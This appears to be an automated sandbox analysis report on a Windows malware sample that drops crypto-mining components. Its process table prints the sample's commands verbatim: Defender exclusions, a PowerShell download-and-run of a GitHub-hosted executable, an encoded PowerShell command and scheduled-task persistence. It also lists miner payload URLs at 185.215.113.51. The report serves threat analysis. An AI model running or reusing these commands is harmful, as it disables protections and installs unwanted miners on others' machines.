Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Arly.exe1.exe
|
PE32+ executable (console) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\Dllhost\WinRing0x64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Dllhost\winlogson.exe
|
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\ZTXEX2709J4S3M888Q2LJG.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
modified
|
|
|
|
C:\dmikhsv\file_scaricato.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\HostData\logs.uce
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wrmcxay.znm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xr41tbf.cig.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24jjip12.ht3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cns1yywq.eds.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gwzlennh.fb4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4cbgvu0.prf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj40jfv0.55l.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xralgc2n.2x1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4r1unjv.mxg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyz3jokk.zot.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\logs.uce
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\logs.uce
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 10 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\Arly.exe1.exe
|
"C:\Users\user\Desktop\Arly.exe1.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\dmikhsv', 'C:\Users', 'C:\ProgramData'"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionPath 'C:\dmikhsv', 'C:\Users', 'C:\ProgramData'"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/notyhkkadaw.exe'
-OutFile 'C:\dmikhsv\file_scaricato.exe'"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/notyhkkadaw.exe'
-OutFile 'C:\dmikhsv\file_scaricato.exe'"
|
|
|
|
C:\dmikhsv\file_scaricato.exe
|
"C:\dmikhsv\file_scaricato.exe"
|
|
|
|
C:\Users\user\AppData\Local\Temp\ZTXEX2709J4S3M888Q2LJG.exe
|
"C:\Users\user\AppData\Local\Temp\ZTXEX2709J4S3M888Q2LJG.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /C powershell -EncodedCommand "PAAjAEoARQAwADAATAB0ADcAUgBEAG8AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBlAHYAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBMAHUARABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADYAQQBlAGEAdABuACMAPgA="
& powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg
/x -standby-timeout-dc 0 & powercfg /hibernate off
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -EncodedCommand "PAAjAEoARQAwADAATAB0ADcAUgBEAG8AIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBlAHYAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBMAHUARABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADYAQQBlAGEAdABuACMAPgA="
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -hibernate-timeout-ac 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -hibernate-timeout-dc 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -standby-timeout-ac 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /x -standby-timeout-dc 0
|
|
|
|
C:\Windows\SysWOW64\powercfg.exe
|
powercfg /hibernate off
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5482" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5482" /TR "C:\ProgramData\Dllhost\dllhost.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 12 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://185.215.113.51/WatchDog.exe
|
unknown
|
||
|
https://raw.githubusercontent.com/deripascod/coderoom/refs/heads/main/notyhkkadaw.exe
|
185.199.108.133
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://crosshairc.life/d
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://ocsp.entrust.net02
|
unknown
|
||
|
http://www.enigmaprotector.com/openU
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://185.215.113.51/WinRing0x64.sysP
|
unknown
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
https://crosshairc.life/s
|
unknown
|
||
|
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
|
unknown
|
||
|
http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
|
unknown
|
||
|
http://185.215.113.51/WatchDog.exeP
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
|
unknown
|
||
|
https://crosshairc.life/dAnjhw
|
104.21.112.1
|
||
|
https://crosshairc.life/dAnjhww
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://crosshairc.life:443/dAnjhwY
|
unknown
|
||
|
http://x1.c.lencr.org/0
|
unknown
|
||
|
http://x1.i.lencr.org/0
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://185.215.113.51/WinRing0x64.sys
|
185.215.113.51
|
||
|
https://crosshairc.life/dAnjhwl
|
unknown
|
||
|
http://185.215.113.51/conhost.exe(
|
unknown
|
||
|
http://crl.entrust.net/ts1ca.crl0
|
unknown
|
||
|
https://support.mozilla.org/products/firefoxgro.all
|
unknown
|
||
|
https://pastebin.com/raw/YpJeSRBC
|
172.67.19.24
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://www.mozilla.or
|
unknown
|
||
|
http://185.215.113.51/lolMiner.exe
|
unknown
|
||
|
https://crosshairc.life/
|
unknown
|
||
|
https://github.com/deripascod/coderoom/raw/refs/heads/main/notyhkkadaw.exe
|
140.82.121.4
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://185.215.113.51/conhost.exeme
|
unknown
|
||
|
https://crosshairc.life/dAnjhwX
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
|
unknown
|
||
|
http://185.215.113.51/
|
unknown
|
||
|
http://185.215.113.51/conhost.exe
|
unknown
|
||
|
http://www.entrust.net/rpa03
|
unknown
|
||
|
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
|
unknown
|
||
|
https://duckduckgo.com/chrome_newtabv20-
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://aia.entrust.net/ts1-chain256.cer01
|
unknown
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
|
https://ac.ecosia.org?q=
|
unknown
|
||
|
http://pastebin.comd
|
unknown
|
||
|
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
|
http://185.215.113.51:80/conhost.exe
|
unknown
|
||
|
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
|
unknown
|
||
|
http://185.215.113.51
|
unknown
|
||
|
http://185.215.113.51/xmrig.exeP
|
unknown
|
||
|
http://185.215.113.51/xmrig.exe
|
185.215.113.51
|
||
|
https://www.ecosia.org/newtab/v20
|
unknown
|
||
|
http://185.215.113.51D
|
unknown
|
||
|
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
|
unknown
|
||
|
https://crosshairc.life/dAnjhw2
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
|
unknown
|
||
|
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
|
https://crosshairc.life:443/dAnjhw
|
unknown
|
||
|
http://185.215.113.51/WatchDog.exeEhttp://==
|
unknown
|
||
|
http://www.enigmaprotector.com/
|
unknown
|
||
|
http://pastebin.com
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
|
https://pastebin.com
|
unknown
|
||
|
https://gemini.google.com/app?q=
|
unknown
|
||
|
http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
|
unknown
|
||
|
https://www.entrust.net/rpa0
|
unknown
|
There are 69 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
github.com
|
140.82.121.4
|
||
|
raw.githubusercontent.com
|
185.199.108.133
|
||
|
pastebin.com
|
172.67.19.24
|
||
|
crosshairc.life
|
104.21.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.112.1
|
crosshairc.life
|
United States
|
||
|
172.67.19.24
|
pastebin.com
|
United States
|
||
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
||
|
140.82.121.4
|
github.com
|
United States
|
||
|
185.215.113.51
|
unknown
|
Portugal
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ZTXEX2709J4S3M888Q2LJG_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2A1B000
|
trusted library allocation
|
page read and write
|
|
|
|
4398000
|
trusted library allocation
|
page read and write
|
||
|
8D00000
|
trusted library allocation
|
page read and write
|
||
|
439F000
|
trusted library allocation
|
page read and write
|
||
|
8B5E000
|
stack
|
page read and write
|
||
|
385F000
|
stack
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
15F8000
|
heap
|
page read and write
|
||
|
755A000
|
stack
|
page read and write
|
||
|
BFF000
|
unkown
|
page execute and read and write
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
D44000
|
unkown
|
page execute and read and write
|
||
|
877E000
|
stack
|
page read and write
|
||
|
160A000
|
heap
|
page read and write
|
||
|
32E0000
|
remote allocation
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
15EC000
|
heap
|
page read and write
|
||
|
33C0000
|
direct allocation
|
page execute and read and write
|
||
|
D76000
|
trusted library allocation
|
page read and write
|
||
|
23B0000
|
heap
|
page read and write
|
||
|
23009C70000
|
heap
|
page read and write
|
||
|
52C9000
|
stack
|
page read and write
|
||
|
4391000
|
trusted library allocation
|
page read and write
|
||
|
26A3000
|
heap
|
page read and write
|
||
|
8EFF000
|
stack
|
page read and write
|
||
|
2776000
|
heap
|
page read and write
|
||
|
160C000
|
heap
|
page read and write
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
439D000
|
trusted library allocation
|
page read and write
|
||
|
6150000
|
heap
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
89B9000
|
heap
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
1607000
|
heap
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
459E000
|
trusted library allocation
|
page read and write
|
||
|
1611000
|
heap
|
page read and write
|
||
|
4402000
|
trusted library allocation
|
page read and write
|
||
|
160C000
|
heap
|
page read and write
|
||
|
27C0000
|
heap
|
page read and write
|
||
|
43AF000
|
trusted library allocation
|
page read and write
|
||
|
15F8000
|
heap
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
2340000
|
heap
|
page read and write
|
||
|
64CE000
|
stack
|
page read and write
|
||
|
32EF000
|
stack
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
4398000
|
trusted library allocation
|
page read and write
|
||
|
4394000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
43AD000
|
trusted library allocation
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
43FF000
|
trusted library allocation
|
page read and write
|
||
|
272C000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
BA0000
|
unkown
|
page readonly
|
||
|
2670000
|
trusted library allocation
|
page read and write
|
||
|
33C4000
|
direct allocation
|
page execute and read and write
|
||
|
43DD000
|
trusted library allocation
|
page read and write
|
||
|
4E4E000
|
stack
|
page read and write
|
||
|
781E000
|
stack
|
page read and write
|
||
|
8820000
|
heap
|
page read and write
|
||
|
73680000
|
unkown
|
page readonly
|
||
|
34A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
628D000
|
stack
|
page read and write
|
||
|
43E7000
|
trusted library allocation
|
page read and write
|
||
|
160C000
|
heap
|
page read and write
|
||
|
43B4000
|
trusted library allocation
|
page read and write
|
||
|
E48000
|
stack
|
page read and write
|
||
|
307D000
|
stack
|
page read and write
|
||
|
306F000
|
heap
|
page read and write
|
||
|
43C6000
|
trusted library allocation
|
page read and write
|
||
|
88EC000
|
heap
|
page read and write
|
||
|
15D2000
|
heap
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
23008021000
|
heap
|
page read and write
|
||
|
C4A000
|
trusted library allocation
|
page execute and read and write
|
||
|
32E0000
|
remote allocation
|
page read and write
|
||
|
3670000
|
heap
|
page read and write
|
||
|
2DAF000
|
stack
|
page read and write
|
||
|
7A79000
|
heap
|
page read and write
|
||
|
16D000
|
stack
|
page read and write
|
||
|
992000
|
heap
|
page read and write
|
||
|
1614000
|
heap
|
page read and write
|
||
|
307C000
|
heap
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
34D0000
|
trusted library allocation
|
page read and write
|
||
|
3600000
|
heap
|
page read and write
|
||
|
2D0F000
|
stack
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
8B10000
|
trusted library allocation
|
page read and write
|
||
|
7C20000
|
trusted library allocation
|
page read and write
|
||
|
7FF6246E0000
|
unkown
|
page readonly
|
||
|
266E000
|
stack
|
page read and write
|
||
|
33C4000
|
direct allocation
|
page execute and read and write
|
||
|
9EB000
|
heap
|
page read and write
|
||
|
15E4000
|
heap
|
page read and write
|
||
|
294E000
|
trusted library allocation
|
page read and write
|
||
|
8D10000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
CD0000
|
trusted library allocation
|
page read and write
|
||
|
13F7000
|
heap
|
page read and write
|
||
|
5421000
|
trusted library allocation
|
page read and write
|
||
|
6AD0000
|
heap
|
page read and write
|
||
|
161C000
|
heap
|
page read and write
|
||
|
340C000
|
heap
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
26A8000
|
heap
|
page read and write
|
||
|
43E3000
|
trusted library allocation
|
page read and write
|
||
|
326F000
|
stack
|
page read and write
|
||
|
15E4000
|
heap
|
page read and write
|
||
|
43D8000
|
trusted library allocation
|
page read and write
|
||
|
ED0000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
8837000
|
trusted library allocation
|
page read and write
|
||
|
439C000
|
trusted library allocation
|
page read and write
|
||
|
3135000
|
heap
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
247E000
|
stack
|
page read and write
|
||
|
34B9000
|
trusted library allocation
|
page read and write
|
||
|
65C4000
|
trusted library allocation
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
439F000
|
trusted library allocation
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
31CE000
|
stack
|
page read and write
|
||
|
27FE000
|
stack
|
page read and write
|
||
|
439F000
|
trusted library allocation
|
page read and write
|
||
|
33C4000
|
direct allocation
|
page execute and read and write
|
||
|
5E87000
|
trusted library allocation
|
page read and write
|
||
|
2678000
|
trusted library allocation
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
43F4000
|
trusted library allocation
|
page read and write
|
||
|
1606000
|
heap
|
page read and write
|
||
|
FFC34FF000
|
stack
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
35B8000
|
heap
|
page read and write
|
||
|
1612000
|
heap
|
page read and write
|
||
|
237E000
|
unkown
|
page read and write
|
||
|
15ED000
|
heap
|
page read and write
|
||
|
3C3E000
|
stack
|
page read and write
|
||
|
1ED000
|
stack
|
page read and write
|
||
|
43B8000
|
trusted library allocation
|
page read and write
|
||
|
930000
|
trusted library allocation
|
page read and write
|
||
|
1580000
|
heap
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
43A6000
|
trusted library allocation
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
5D6F000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
7A97000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
2A40000
|
trusted library allocation
|
page read and write
|
||
|
79D0000
|
heap
|
page read and write
|
||
|
6449000
|
trusted library allocation
|
page read and write
|
||
|
944000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
heap
|
page read and write
|
||
|
FFC2BC7000
|
stack
|
page read and write
|
||
|
43BF000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
D82000
|
trusted library allocation
|
page read and write
|
||
|
D8E000
|
trusted library allocation
|
page read and write
|
||
|
43A4000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
trusted library allocation
|
page read and write
|
||
|
A50000
|
trusted library allocation
|
page read and write
|
||
|
2690000
|
trusted library allocation
|
page read and write
|
||
|
63CE000
|
stack
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
8985000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
4391000
|
trusted library allocation
|
page read and write
|
||
|
1582000
|
heap
|
page read and write
|
||
|
3580000
|
heap
|
page readonly
|
||
|
233E000
|
stack
|
page read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
2A10000
|
heap
|
page read and write
|
||
|
53F0000
|
heap
|
page execute and read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
473D000
|
trusted library allocation
|
page read and write
|
||
|
43FF000
|
trusted library allocation
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7369F000
|
unkown
|
page readonly
|
||
|
160C000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
D2E000
|
stack
|
page read and write
|
||
|
4414000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
43CC000
|
trusted library allocation
|
page read and write
|
||
|
3631000
|
trusted library allocation
|
page execute read
|
||
|
66CD000
|
stack
|
page read and write
|
||
|
FFC30FE000
|
stack
|
page read and write
|
||
|
2C28000
|
heap
|
page read and write
|
||
|
61E4000
|
heap
|
page read and write
|
||
|
531F000
|
stack
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
43CF000
|
trusted library allocation
|
page read and write
|
||
|
43CA000
|
trusted library allocation
|
page read and write
|
||
|
5E3A000
|
trusted library allocation
|
page read and write
|
||
|
23007FFF000
|
heap
|
page read and write
|
||
|
2685000
|
trusted library allocation
|
page read and write
|
||
|
23007FD0000
|
heap
|
page read and write
|
||
|
4402000
|
trusted library allocation
|
page read and write
|
||
|
29F5000
|
trusted library allocation
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
211D000
|
stack
|
page read and write
|
||
|
D64000
|
unkown
|
page execute and read and write
|
||
|
638E000
|
stack
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
2A4F000
|
stack
|
page read and write
|
||
|
4424000
|
trusted library allocation
|
page read and write
|
||
|
15F8000
|
heap
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
6F1F000
|
stack
|
page read and write
|
||
|
160F000
|
heap
|
page read and write
|
||
|
160A000
|
heap
|
page read and write
|
||
|
D7E000
|
trusted library allocation
|
page read and write
|
||
|
5395000
|
heap
|
page execute and read and write
|
||
|
4707000
|
trusted library allocation
|
page read and write
|
||
|
74DE000
|
stack
|
page read and write
|
||
|
95A000
|
heap
|
page read and write
|
||
|
4391000
|
trusted library allocation
|
page read and write
|
